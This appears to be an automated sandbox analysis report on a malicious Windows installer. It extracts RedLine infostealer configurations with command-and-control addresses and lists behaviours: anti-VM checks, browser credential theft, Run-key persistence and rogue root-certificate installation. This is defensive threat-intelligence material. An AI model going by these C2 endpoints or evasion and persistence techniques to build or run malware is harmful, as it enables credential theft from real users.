Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
1Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
185s -
max time network
1824s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-08-2021 20:46
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210410
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210408
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210408
General
-
Target
Setup (16).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
redline
22.08
95.181.172.100:55640
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3640 3688 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7712 3688 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8428 3688 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6984 3688 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe family_redline C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe family_redline C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe family_redline behavioral16/memory/4692-237-0x0000000000400000-0x0000000000448000-memory.dmp family_redline behavioral16/memory/4848-253-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral16/memory/4848-258-0x000000000041A616-mapping.dmp family_redline behavioral16/memory/4732-247-0x000000000041A6E6-mapping.dmp family_redline behavioral16/memory/4732-240-0x0000000000400000-0x0000000000420000-memory.dmp family_redline C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4976 created 4148 4976 WerFault.exe Hke7Np3HCf3BHr3IQJqdiMka.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 61 IoCs
Processes:
onR8itfYViCRadwknZWvxq1a.exeknDM9K2WuDIgPpvZTz7iJyiv.exe7L7SmCmxZBuK866H9J56dZ9i.exewYHXVXkFz5ne2Vq6ab0DG5k3.exepmraugcfGvbfWwNKMGckSwss.exeYfaqickjSQEwGsn4tTZyes3_.exeP2jRvKFkhoFqiCE2FzuSofFu.exe8N7tugtAoWe9lbLX05F7nk6f.exewpjiSuP2zkRSF5LjZiDIMr7J.exep677u7IwPoa5s4gcdt8zN2Yk.exeZleAaxLiBY5xMwGlObFp_7l2.exesYC7WokZSkdkVMNtIgLEIsRL.exe888qQtt12NDSY2tU8zniAWFT.exeOlLnyMjDYM2HF94iR5guLlDE.exe4tMCbZ0yGruE8d0Ny9jeWOfq.exe8VmzjVht_DClLCJG_RJh5V4E.exexvTYZ1hjTDj5Rr5UfraK7e1b.exe0vwfJ_G6kZ5XuDO0BlYvi3cn.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exedsmuEcIl37bzLp4Drmm1l74f.exeYtjpPTrrwUN8IYNue5FqWCqm.exeGFXV5uf_XQa804CDnoWH0M3p.exefIAkXcZipnfF7F6wfSKwz046.exeHke7Np3HCf3BHr3IQJqdiMka.exe5XHdUK3CmLKAHDrBaHQzFR94.exejooyu.exemd8_8eus.execustomer3.exemsiexec.exeVU1EDKbEK8gfqyvnCHOs4E4z.tmpxvTYZ1hjTDj5Rr5UfraK7e1b.exeknDM9K2WuDIgPpvZTz7iJyiv.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exeZleAaxLiBY5xMwGlObFp_7l2.exeYfaqickjSQEwGsn4tTZyes3_.exehBS_VbW.EXEjfiag3g_gg.exe6641540.exe1486191.exe3187448.exe8N7tugtAoWe9lbLX05F7nk6f.exe8011660.exeEsplorarne.exe.com11111.exeWinHoster.exerunvd.exeInlog.exeCleaner Installation.exeWEATHER Manager.exeInlog.tmpVPN.exeaskinstall53.exeEsplorarne.exe.comEsplorarne.exe.comrCbCiUdQSdSKQbtldclFAOsT.exe11111.exetapinstall.exeeTAuEb4oya06vxJ793JUQkse.exeLivelyScreenRecS1.9.exeEsplorarne.exe.comxtect12.exepid process 4012 onR8itfYViCRadwknZWvxq1a.exe 3276 knDM9K2WuDIgPpvZTz7iJyiv.exe 1068 7L7SmCmxZBuK866H9J56dZ9i.exe 1072 wYHXVXkFz5ne2Vq6ab0DG5k3.exe 3744 pmraugcfGvbfWwNKMGckSwss.exe 3728 YfaqickjSQEwGsn4tTZyes3_.exe 2560 P2jRvKFkhoFqiCE2FzuSofFu.exe 2676 8N7tugtAoWe9lbLX05F7nk6f.exe 1656 wpjiSuP2zkRSF5LjZiDIMr7J.exe 2680 p677u7IwPoa5s4gcdt8zN2Yk.exe 3172 ZleAaxLiBY5xMwGlObFp_7l2.exe 1308 sYC7WokZSkdkVMNtIgLEIsRL.exe 192 888qQtt12NDSY2tU8zniAWFT.exe 3252 OlLnyMjDYM2HF94iR5guLlDE.exe 776 4tMCbZ0yGruE8d0Ny9jeWOfq.exe 3724 8VmzjVht_DClLCJG_RJh5V4E.exe 1928 xvTYZ1hjTDj5Rr5UfraK7e1b.exe 1316 0vwfJ_G6kZ5XuDO0BlYvi3cn.exe 2716 aSn9fqpqDhGYu3GbZ1S1TS6I.exe 2892 dsmuEcIl37bzLp4Drmm1l74f.exe 3748 YtjpPTrrwUN8IYNue5FqWCqm.exe 3440 GFXV5uf_XQa804CDnoWH0M3p.exe 3784 fIAkXcZipnfF7F6wfSKwz046.exe 4148 Hke7Np3HCf3BHr3IQJqdiMka.exe 4220 5XHdUK3CmLKAHDrBaHQzFR94.exe 4400 jooyu.exe 4436 md8_8eus.exe 4476 customer3.exe 4604 msiexec.exe 4760 VU1EDKbEK8gfqyvnCHOs4E4z.tmp 4832 xvTYZ1hjTDj5Rr5UfraK7e1b.exe 4692 knDM9K2WuDIgPpvZTz7iJyiv.exe 4732 aSn9fqpqDhGYu3GbZ1S1TS6I.exe 4848 ZleAaxLiBY5xMwGlObFp_7l2.exe 3712 YfaqickjSQEwGsn4tTZyes3_.exe 1472 hBS_VbW.EXE 3812 jfiag3g_gg.exe 4408 6641540.exe 304 1486191.exe 3644 3187448.exe 3860 8N7tugtAoWe9lbLX05F7nk6f.exe 488 8011660.exe 5352 Esplorarne.exe.com 5388 11111.exe 5424 WinHoster.exe 5636 runvd.exe 5676 Inlog.exe 5704 Cleaner Installation.exe 5748 WEATHER Manager.exe 5804 Inlog.tmp 5832 VPN.exe 5856 askinstall53.exe 5884 Esplorarne.exe.com 6048 Esplorarne.exe.com 6076 rCbCiUdQSdSKQbtldclFAOsT.exe 6092 11111.exe 6140 tapinstall.exe 6128 eTAuEb4oya06vxJ793JUQkse.exe 5348 LivelyScreenRecS1.9.exe 5460 Esplorarne.exe.com 4432 xtect12.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
5XHdUK3CmLKAHDrBaHQzFR94.exe8VmzjVht_DClLCJG_RJh5V4E.exesYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5XHdUK3CmLKAHDrBaHQzFR94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8VmzjVht_DClLCJG_RJh5V4E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8VmzjVht_DClLCJG_RJh5V4E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sYC7WokZSkdkVMNtIgLEIsRL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sYC7WokZSkdkVMNtIgLEIsRL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GFXV5uf_XQa804CDnoWH0M3p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GFXV5uf_XQa804CDnoWH0M3p.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5XHdUK3CmLKAHDrBaHQzFR94.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup (16).exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (16).exe -
Loads dropped DLL 13 IoCs
Processes:
0vwfJ_G6kZ5XuDO0BlYvi3cn.exeVU1EDKbEK8gfqyvnCHOs4E4z.tmponR8itfYViCRadwknZWvxq1a.exeCleaner Installation.exeInlog.tmpEsplorarne.exe.comcmd.exetapinstall.exeEsplorarne.exe.compid process 1316 0vwfJ_G6kZ5XuDO0BlYvi3cn.exe 4760 VU1EDKbEK8gfqyvnCHOs4E4z.tmp 4760 VU1EDKbEK8gfqyvnCHOs4E4z.tmp 4012 onR8itfYViCRadwknZWvxq1a.exe 5704 Cleaner Installation.exe 5804 Inlog.tmp 5804 Inlog.tmp 6048 Esplorarne.exe.com 6048 Esplorarne.exe.com 3756 cmd.exe 6140 tapinstall.exe 6140 tapinstall.exe 5460 Esplorarne.exe.com -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe themida C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe themida C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe themida C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe themida C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe themida C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe themida C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe themida behavioral16/memory/3724-224-0x0000000001040000-0x0000000001041000-memory.dmp themida behavioral16/memory/1308-228-0x0000000001240000-0x0000000001241000-memory.dmp themida behavioral16/memory/3440-245-0x0000000000F90000-0x0000000000F91000-memory.dmp themida C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe themida C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe themida C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
1486191.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1486191.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
sYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exe5XHdUK3CmLKAHDrBaHQzFR94.exe8VmzjVht_DClLCJG_RJh5V4E.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sYC7WokZSkdkVMNtIgLEIsRL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GFXV5uf_XQa804CDnoWH0M3p.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5XHdUK3CmLKAHDrBaHQzFR94.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8VmzjVht_DClLCJG_RJh5V4E.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 405 ipinfo.io 32 ipinfo.io 148 ip-api.com 152 ipinfo.io 154 ipinfo.io 223 ipinfo.io 224 ipinfo.io 225 ipinfo.io 31 ipinfo.io 403 ipinfo.io 231 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
8VmzjVht_DClLCJG_RJh5V4E.exesYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exe5XHdUK3CmLKAHDrBaHQzFR94.exepid process 3724 8VmzjVht_DClLCJG_RJh5V4E.exe 1308 sYC7WokZSkdkVMNtIgLEIsRL.exe 3440 GFXV5uf_XQa804CDnoWH0M3p.exe 4220 5XHdUK3CmLKAHDrBaHQzFR94.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
aSn9fqpqDhGYu3GbZ1S1TS6I.exeZleAaxLiBY5xMwGlObFp_7l2.exeYfaqickjSQEwGsn4tTZyes3_.exedescription pid process target process PID 2716 set thread context of 4732 2716 aSn9fqpqDhGYu3GbZ1S1TS6I.exe aSn9fqpqDhGYu3GbZ1S1TS6I.exe PID 3172 set thread context of 4848 3172 ZleAaxLiBY5xMwGlObFp_7l2.exe ZleAaxLiBY5xMwGlObFp_7l2.exe PID 3728 set thread context of 3712 3728 YfaqickjSQEwGsn4tTZyes3_.exe YfaqickjSQEwGsn4tTZyes3_.exe -
Drops file in Program Files directory 19 IoCs
Processes:
p677u7IwPoa5s4gcdt8zN2Yk.exeEsplorarne.exe.comdescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe p677u7IwPoa5s4gcdt8zN2Yk.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini p677u7IwPoa5s4gcdt8zN2Yk.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe p677u7IwPoa5s4gcdt8zN2Yk.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe p677u7IwPoa5s4gcdt8zN2Yk.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Esplorarne.exe.com File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe p677u7IwPoa5s4gcdt8zN2Yk.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Esplorarne.exe.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1764 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 4976 4148 WerFault.exe 4876 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 3272 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 3524 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 5684 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 4272 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 6032 2560 WerFault.exe P2jRvKFkhoFqiCE2FzuSofFu.exe 4508 3744 WerFault.exe pmraugcfGvbfWwNKMGckSwss.exe 5512 4012 WerFault.exe onR8itfYViCRadwknZWvxq1a.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
YfaqickjSQEwGsn4tTZyes3_.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YfaqickjSQEwGsn4tTZyes3_.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YfaqickjSQEwGsn4tTZyes3_.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI YfaqickjSQEwGsn4tTZyes3_.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 2280 taskkill.exe 5968 taskkill.exe 4308 taskkill.exe -
Modifies registry class 3 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Processes:
Setup (16).exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (16).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (16).exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 177 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 185 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 221 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 228 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 153 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 171 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 404 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 408 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 154 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (16).exeYfaqickjSQEwGsn4tTZyes3_.exeWerFault.exeWerFault.exepid process 3892 Setup (16).exe 3892 Setup (16).exe 3712 YfaqickjSQEwGsn4tTZyes3_.exe 3712 YfaqickjSQEwGsn4tTZyes3_.exe 2824 2824 2824 2824 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 2824 2824 2824 2824 2824 2824 2824 2824 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 4976 WerFault.exe 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2824 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
YfaqickjSQEwGsn4tTZyes3_.exepid process 3712 YfaqickjSQEwGsn4tTZyes3_.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
0vwfJ_G6kZ5XuDO0BlYvi3cn.exe8N7tugtAoWe9lbLX05F7nk6f.exe4tMCbZ0yGruE8d0Ny9jeWOfq.exesYC7WokZSkdkVMNtIgLEIsRL.exeWerFault.exeGFXV5uf_XQa804CDnoWH0M3p.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exeWerFault.exeWerFault.exe7L7SmCmxZBuK866H9J56dZ9i.exeWerFault.exeknDM9K2WuDIgPpvZTz7iJyiv.exeZleAaxLiBY5xMwGlObFp_7l2.exe8VmzjVht_DClLCJG_RJh5V4E.exe6641540.exetaskkill.exewpjiSuP2zkRSF5LjZiDIMr7J.exeWerFault.exe5XHdUK3CmLKAHDrBaHQzFR94.exe8011660.exe3187448.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 1316 0vwfJ_G6kZ5XuDO0BlYvi3cn.exe Token: SeDebugPrivilege 2676 8N7tugtAoWe9lbLX05F7nk6f.exe Token: SeDebugPrivilege 776 4tMCbZ0yGruE8d0Ny9jeWOfq.exe Token: SeDebugPrivilege 1308 sYC7WokZSkdkVMNtIgLEIsRL.exe Token: SeRestorePrivilege 1764 WerFault.exe Token: SeBackupPrivilege 1764 WerFault.exe Token: SeDebugPrivilege 3440 